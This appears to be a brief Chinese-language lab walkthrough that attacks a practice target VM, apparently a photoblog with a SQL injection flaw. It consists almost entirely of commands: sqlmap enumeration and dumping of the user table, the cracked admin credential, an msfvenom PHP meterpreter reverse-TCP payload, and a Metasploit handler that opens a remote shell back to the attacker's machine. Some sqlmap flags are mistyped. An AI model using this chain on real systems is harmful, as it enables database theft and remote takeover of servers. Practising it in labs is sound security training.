靶机地址:192.168.43.156
攻击机地址:192.168.43.89
一、AppScan检查靶机sql漏洞

二、使用sqlmap利用SQL注入漏洞
1.sqlmap -u "
http://192.168.43.156/cat.php?id=1" –dbs 查看数据库名

2.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" --tables 表名

3.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" --columns 查看字段

4.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" -C "login" --dump

用同种方法查找密码
三、建立反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw

在桌面建一个文件shell.php

四、登录后台页面
刚在数据库拿到的用户名:admin
密码需要用MD5解密为:
P4ssw0rd


在kali系统内
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在页面运行shell就可以就如靶机